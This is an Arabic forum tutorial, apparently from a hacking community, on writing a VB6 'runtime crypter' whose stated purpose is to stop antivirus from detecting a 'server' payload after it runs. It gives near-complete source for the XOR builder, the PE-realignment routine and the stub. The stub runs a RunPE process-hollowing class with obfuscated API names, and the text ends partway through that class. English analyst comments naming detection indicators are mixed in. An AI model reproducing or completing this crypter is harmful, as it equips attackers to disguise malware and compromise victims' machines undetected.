برمجـة برنامج تشفير RuNTimE بأستعمال VB6 والتشفير دائماً CLEAN ∫∫::.
برمجـة برنامج تشفير RuNTimE بأستعمال VB6 والتشفير دائماً CLEAN ∫∫::.
دائماً نبحث عن [ الجديد ] وسوف نقدم لكم [ الجديد ] ..
طبعاً هذه هديـة مني تقبلوها بصدر رحب ~
من فريق عمل Dev-PoiNT .. فـ لهم الشكر الجزيل ..
وأنت أيضا أيه المبدعون والأصدقاء .. كم لكم من الفكر التي أحاول أن أنتجها بشكل جديد !
طبعاً درسنا هو [ برمجـة برنامج تشفير RuNTiMe بأستعمال VB6 ] ~
RuNTimE هو تشفير أصل السيرفر وأنتاجه بنفس التشفيرة و حيث بعد التشغيل لا ينكشف أو يصطاده برنامج الحمايـة !
طبعاً نحتاج إلى Vb6 الفيجوال بيسك .. ولتحميله من هنا ..
راح ينقسم درسنا اليوم إلى قسمين :
1 - برمجـة برنامج التشفير
2- برمجـة ستب برنامج التشفير
في البدايـة
1 - برمجـة برنامج التشفير
نقوم بتشغيل الفيجوال بيسك 6 ومن ثم أتباع الأتي :
الأن نلصق هذا الكود :
كود:
' Builder button handler: reads Stub.exe and the file named in Text1, transforms the
' latter with Encrypt, and writes  stub + fixed marker + transformed payload  to the
' path chosen in the save dialog. Optionally calls RealignPEFromFile on the output.
' Analyst notes: the output is the stub executable with extra data appended after it.
' The marker literal written below and the key literal passed to Encrypt are the same
' literals the stub's Main uses, so both are static indicators in a sample, and the
' marker locates where the embedded payload starts.
Private Sub Command2_Click()
Dim Stub As String
Dim File As String
' Path of the stub: Stub.exe in the builder's own directory
Open App.Path & "\Stub.exe" For Binary As #1
Stub = Space(LOF(1))
Get #1, , Stub
Close #1
' Dialog for choosing where to save the encrypted output
With CommonDialog1
.DialogTitle = "حدد مكان حفظ الملف المشفر"
.Filter = "تطبيقات |*.exe"
.ShowSave
End With
' Read the input file whose path was placed in the text box (Text1)
Open Text1.Text For Binary As #1
File = Space(LOF(1))
Get #1, , File
Close #1
' Encryption routine (see Encrypt: a repeating-key XOR with a hard-coded key)
File = Encrypt(File, "AD8TGYSS5N66UCG8162U3G")
Open CommonDialog1.FileName For Binary As #1
' Output layout: stub bytes, then the fixed marker string, then the transformed payload
Put #1, , Stub & "56XTCF8AQ2U3F11NU681J5" & File
Close #1
' When the checkbox is set, the last section header of the output is rewritten so that
' the appended data is counted as part of that section (see RealignPEFromBytes)
If chk_realign.Value = 1 Then
Call RealignPEFromFile(CommonDialog1.FileName)
End If
' Completion message
MsgBox "تم التشفير ", vbInformation
End Sub
' Builder button handler: shows an open-file dialog filtered to *.exe and, if a file
' was chosen, copies its path into Text1 (the path Command2_Click later reads).
Private Sub Command1_Click()
' Dialog for choosing the executable ("server") to be encrypted
With CommonDialog1
.DialogTitle = "أختر الملف المراد تشفيه !"
.Filter = "تطبيقات |*.exe"
.ShowOpen
End With
' Only update the text box when the dialog returned a non-empty file name
If Not CommonDialog1.FileName = vbNullString Then
Text1.Text = CommonDialog1.FileName
End If
End Sub
' Transforms sText byte by byte with a repeating-key XOR derived from sKey and
' returns the result as a string.
'   sText - data to transform (converted to bytes with StrConv/vbFromUnicode)
'   sKey  - key string; its bytes are cycled through with index x
' Analyst notes: the inner loop XORs each byte with (k(x) Mod (y + 5)) for y = 1..255,
' so the net mask applied to a byte depends only on the key byte k(x). XOR is its own
' inverse, which is why the stub's Decrypt is the same routine. With the key stored as
' a literal in the program, the payload can be recovered from a sample offline by
' applying this routine to the data that follows the marker.
Public Function Encrypt(sText As String, sKey As String) As String
Dim i, x, y As Integer, b() As Byte, k() As Byte
Encrypt = vbNullString
x = 0
b() = StrConv(sText, vbFromUnicode)
k() = StrConv(sKey, vbFromUnicode)
For i = 0 To Len(sText) - 1
' x is advanced before it is used, so the first data byte is paired with k(1),
' and x wraps back to 0 after reaching the last key index
If x = Len(sKey) - 1 Then
x = 0
Else
x = x + 1
End If
' 255 successive XORs with values derived from the same key byte
For y = 1 To 255
b(i) = b(i) Xor k(x) Mod (y + 5)
Next y
Next i
Encrypt = StrConv(b, vbUnicode)
End Function
الأن نلصق هذا الكود :
كود:
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_SECTION_HEADER As Long = &H28
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
Private Declare Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long)
' Reads sSrcFile into a byte array, passes it to RealignPEFromBytes and, when that
' returns True, writes the modified bytes to sDstFile.
'   sSrcFile - file to read
'   sDstFile - file to write; when empty it defaults to sSrcFile (in-place rewrite)
' Returns True whenever no runtime error was raised (the assignment below is outside
' the If, so it does not depend on RealignPEFromBytes). On a runtime error execution
' jumps to the label at the end and the function returns False.
Public Function RealignPEFromFile( _
ByVal sSrcFile As String, _
Optional sDstFile As String) As Boolean
Dim bvData() As Byte
On Local Error GoTo RealignPEFromFile_Error
If sDstFile = vbNullString Then
sDstFile = sSrcFile
End If
Open sSrcFile For Binary Access Read As #1
ReDim bvData(LOF(1) - 1)
Get #1, , bvData()
' Close without a file number closes every open file
Close
If RealignPEFromBytes(bvData) Then
Open sDstFile For Binary Access Write As #1
Put #1, , bvData()
Close
End If
RealignPEFromFile = True
On Error GoTo 0
Exit Function
RealignPEFromFile_Error:
End Function
' Rewrites the last section header of a PE32 image held in bvData so that bytes lying
' after the end of the last section's raw data are counted inside that section.
'   bvData - file contents; modified in place and possibly resized
' Returns True after the header has been rewritten; returns False when the DOS
' signature, NT signature or PE32 optional-header magic does not match, or when a
' runtime error occurs (the error label falls through to End Function).
' Analyst notes: in the builder's output the trailing bytes are the marker plus the
' transformed payload. After this routine they presumably no longer show up as an
' overlay past the last section, so a check that only looks for data beyond the final
' section would miss them; the last section's SizeOfRawData is enlarged instead.
Public Function RealignPEFromBytes( _
ByRef bvData() As Byte) As Boolean
Dim lSize As Long
Dim lLastSectPos As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim lDataSize As Long
Dim lAlign As Long
Dim bvExtraData() As Byte
On Local Error GoTo RealignPEFromBytes_Error
' Header parsing: DOS header at offset 0, NT headers at e_lfanew
CopyMemory tIMAGE_DOS_HEADER, bvData(0), SIZE_DOS_HEADER
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
CopyMemory tIMAGE_NT_HEADERS, bvData(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
If Not tIMAGE_NT_HEADERS.OptionalHeader.Magic = IMAGE_NT_OPTIONAL_HDR32_MAGIC Then
Exit Function
End If
' Offset of the last section header, using the fixed header sizes declared above
lLastSectPos = _
tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + _
(tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1) * SIZE_SECTION_HEADER
CopyMemory tIMAGE_SECTION_HEADER, bvData(lLastSectPos), SIZE_SECTION_HEADER
lSize = tIMAGE_SECTION_HEADER.SizeOfRawData
' lDataSize = number of bytes in the buffer after the end of the last section's raw data
lDataSize = UBound(bvData) - tIMAGE_SECTION_HEADER.SizeOfRawData - tIMAGE_SECTION_HEADER.PointerToRawData + 1
If (lSize + lDataSize) Mod tIMAGE_NT_HEADERS.OptionalHeader.SectionAlignment = 0 Then
' Already a multiple of SectionAlignment: the buffer is left as is and lSize
' (the section's original SizeOfRawData) is added to SizeOfRawData
tIMAGE_SECTION_HEADER.SizeOfRawData = _
tIMAGE_SECTION_HEADER.SizeOfRawData + lSize
CopyMemory bvData(lLastSectPos), tIMAGE_SECTION_HEADER, SIZE_SECTION_HEADER
Else
' Otherwise: copy the trailing bytes aside, truncate the buffer to the end of the
' last section, grow it by lAlign (lDataSize rounded up to SectionAlignment), and
' place the trailing bytes at the very end of the enlarged buffer
ReDim bvExtraData(lDataSize - 1)
CopyMemory bvExtraData(0), bvData(UBound(bvData) - lDataSize + 1), lDataSize
ReDim Preserve bvData(UBound(bvData) - lDataSize)
lAlign = lDataSize + tIMAGE_NT_HEADERS.OptionalHeader.SectionAlignment
lAlign = lAlign - (lAlign Mod tIMAGE_NT_HEADERS.OptionalHeader.SectionAlignment)
ReDim Preserve bvData(UBound(bvData) + lAlign)
CopyMemory bvData(UBound(bvData) - lDataSize + 1), bvExtraData(0), lDataSize
tIMAGE_SECTION_HEADER.SizeOfRawData = _
tIMAGE_SECTION_HEADER.SizeOfRawData + lAlign
CopyMemory bvData(lLastSectPos), tIMAGE_SECTION_HEADER, SIZE_SECTION_HEADER
End If
RealignPEFromBytes = True
On Error GoTo 0
Exit Function
RealignPEFromBytes_Error:
End Function
وبكذا خلصنا [ برنامج التشفير ] ~
2- برمجـة ستب برنامج التشفير
الأن نقوم بفتح الفيجوال بيسك مرة أخرى :
هذا هو الكود :
كود:
' Stub entry point: reads a file into a string, splits it on the marker literal the
' builder wrote, transforms the part after the marker with Decrypt, and passes the
' resulting bytes plus a host path to a method of Class1 (presumably the injection
' class listed after this module - confirm the class name in the project).
' Analyst notes: the marker and key literals match the builder's, so they are static
' indicators shared by every output of this builder. The recovered payload is handed
' over as an in-memory byte array; nothing in this routine writes it to disk, so file
' scanning of dropped artifacts would not see it - the process-creation and
' memory-write behavior of the called method is the observable part.
Sub Main()
Dim CLAUKGG As String
Dim XCMBVEQ() As String
Dim lkjh As New Class1
' Path string built from App.Path and App.EXEName
sFile = App.Path & "" & App.EXEName & ".exe"
Open sFile For Binary As #1
CLAUKGG = Space(FileLen(sFile))
Get #1, , CLAUKGG
Close #1
' Element 1 is whatever follows the first occurrence of the marker
XCMBVEQ() = Split(CLAUKGG, "56XTCF8AQ2U3F11NU681J5")
XCMBVEQ(1) = Decrypt(XCMBVEQ(1), "AD8TGYSS5N66UCG8162U3G")
' Second argument is the sHost parameter of the called method (the process to start)
lkjh.nvgx1qc0emtn1rsss3505b2vhqcepsbf75jfeu7015eplu3g9n StrConv(XCMBVEQ(1), vbFromUnicode), App.Path & "" & App.EXEName & ".exe"
End Sub
' Reverses the builder's Encrypt. The body is the same repeating-key XOR: each byte is
' XORed with (k(x) Mod (y + 5)) for y = 1..255, and because XOR is self-inverse,
' applying the routine a second time with the same key restores the original bytes.
'   sText - transformed data
'   sKey  - the key string used by the builder
' Returns the restored data as a string.
Public Function Decrypt(sText As String, sKey As String) As String
Dim i, x, y As Integer, b() As Byte, k() As Byte
Decrypt = vbNullString
x = 0
b() = StrConv(sText, vbFromUnicode)
k() = StrConv(sKey, vbFromUnicode)
For i = 0 To Len(sText) - 1
' Key index is advanced before use and wraps after the last key index
If x = Len(sKey) - 1 Then
x = 0
Else
x = x + 1
End If
For y = 1 To 255
b(i) = b(i) Xor k(x) Mod (y + 5)
Next y
Next i
Decrypt = StrConv(b, vbUnicode)
End Function
هذا هو الكود :
كود:
'---------------------------------------------------------------------------------------
' Module : cNtPEL
' DateTime : 30/06/2009 06:32
' Author : Cobein
' Mail : cobein27@hotmail.com
' ************Page : http://www.advancevb.com.ar (updated =D)
' Purpose : Inject Exe
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any ************ site,
' online service, or distribute as source
' on any media without express permission.
'
' Thanks to : This is gonna be a looong list xD
' Batfitch - kernel base asm
' Karcrack - For helping me to debug and test it
' Paul Caton - vTable patch examples
' rm_code - First call api prototype
' and different books and pappers
'
' Compile : P-Code !!!
'
' Comments : Coded on top of the invoke module.
'
' History : 30/06/2009 First Cut....................................................
' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........
'---------------------------------------------------------------------------------------
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28
Private Const THUNK_APICALL As String = "8B4C240851<UECWKCBKAA>E8<LVACRKQAXR>5989016631C0C3"
Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"
Private Const UECWKCBKAA As String = "<UECWKCBKAA>"
Private Const LVACRKQAXR As String = "<LVACRKQAXR>"
Private Const CONTEXT_FULL As Long = &H10007
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type CONTEXT
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
lpName As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
lpAddressOfFunctions As Long
lpAddressOfNames As Long
lpAddressOfNameOrdinals As Long
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Declare Sub CopyBytes Lib "MSVBVM60.DLL" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
Private c_lKrnl As Long
Private c_lLoadLib As Long
Private c_bInit As Boolean
Private c_lVTE As Long
Private c_lOldVTE As Long
Private c_bvASM(&HFF) As Byte
' Empty placeholder method. The vtable-patching helper in this class temporarily
' redirects a vtable slot to the c_bvASM byte array and then calls this method, so
' the call executes the generated machine code instead of this body.
Public Function avu8wctg2pljj26lpxnotpb5jp2y03kqvhtlmggeflnd0a9qvm() As Long
'This function will be replaced with machine code laterz
'Do not add any public procedure on top of it
End Function
' Process hollowing ("RunPE"): starts sHost suspended and replaces its image with the
' PE held in bvBuff.
'   bvBuff - bytes of the PE image to run
'   sHost  - executable to start; when empty, the current module's file name is
'            obtained through GetModuleFileNameW
'   hProc  - receives the created process handle
' Returns True once both header signatures validate and the sequence has run; the
' results of the individual API calls are not inspected. Returns False when the class
' is not initialized or a signature check fails.
' Module and API names are stored as Chr$() chains spelling hex digits and decoded at
' run time, and the functions are resolved by walking export tables and called through
' generated code, so the names do not appear as plain strings or imports in the
' binary. The existing comments give the decoded names.
' Analyst notes - the behavior remains observable regardless of the string hiding:
' a process created with CREATE_SUSPENDED whose parent then unmaps its image, allocates
' PAGE_EXECUTE_READWRITE memory at an image base, writes into it, changes the primary
' thread's context and resumes it; afterwards the child's in-memory image does not
' correspond to the file it was started from.
Public Function nvgx1qc0emtn1rsss3505b2vhqcepsbf75jfeu7015eplu3g9n(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
Dim i As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tCONTEXT As CONTEXT
Dim lKernel As Long
Dim lNTDll As Long
Dim lMod As Long
If Not c_bInit Then Exit Function
' Validate the payload's DOS and NT signatures before doing anything else
Call CopyBytes(SIZE_DOS_HEADER, tIMAGE_DOS_HEADER, bvBuff(0))
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CopyBytes(SIZE_NT_HEADERS, tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew))
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
'kernel32
lKernel = y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(54) & Chr$(66) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(67) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(50))) 'KPC
'ntdll
lNTDll = y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(54) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(67))) 'KPC
If sHost = vbNullString Then
sHost = Space(260)
'GetModuleFileNameW
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lKernel, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(68) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(53) & Chr$(52) & Chr$(69) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(55))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, App.hInstance, StrPtr(sHost), 260
End If
With tIMAGE_NT_HEADERS.OptionalHeader
tSTARTUPINFO.cb = Len(tSTARTUPINFO)
' Step 1: start the host process with its primary thread suspended
'CreateProcessW
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lKernel, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(48) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(51) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(53) & Chr$(55))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
' Step 2: unmap whatever is mapped at the payload's ImageBase in the new process
'NtUnmapViewOfSection
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(49) & Chr$(55) & Chr$(48) & Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(55) & Chr$(52) & Chr$(70) & Chr$(54) & Chr$(54) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(51) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(57) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(69))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
' Step 3: allocate SizeOfImage bytes at ImageBase, readable, writable and executable
'VirtualAllocEx
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lKernel, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(52) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(51) & Chr$(52) & Chr$(53) & Chr$(55) & Chr$(56))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
' Step 4: write the payload's headers, then each section at ImageBase + VirtualAddress
'NtWriteVirtualMemory
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(55) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(52) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(57))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
CopyBytes Len(tIMAGE_SECTION_HEADER), tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i)
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
Next i
' Step 5: read the suspended thread's register context
tCONTEXT.ContextFlags = CONTEXT_FULL
'NtGetContextThread
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(51) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(52))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
' Step 6: write the 4-byte ImageBase value at Ebx + 8 in the target process
' (presumably the image-base field of the process environment block - confirm)
'NtWriteVirtualMemory
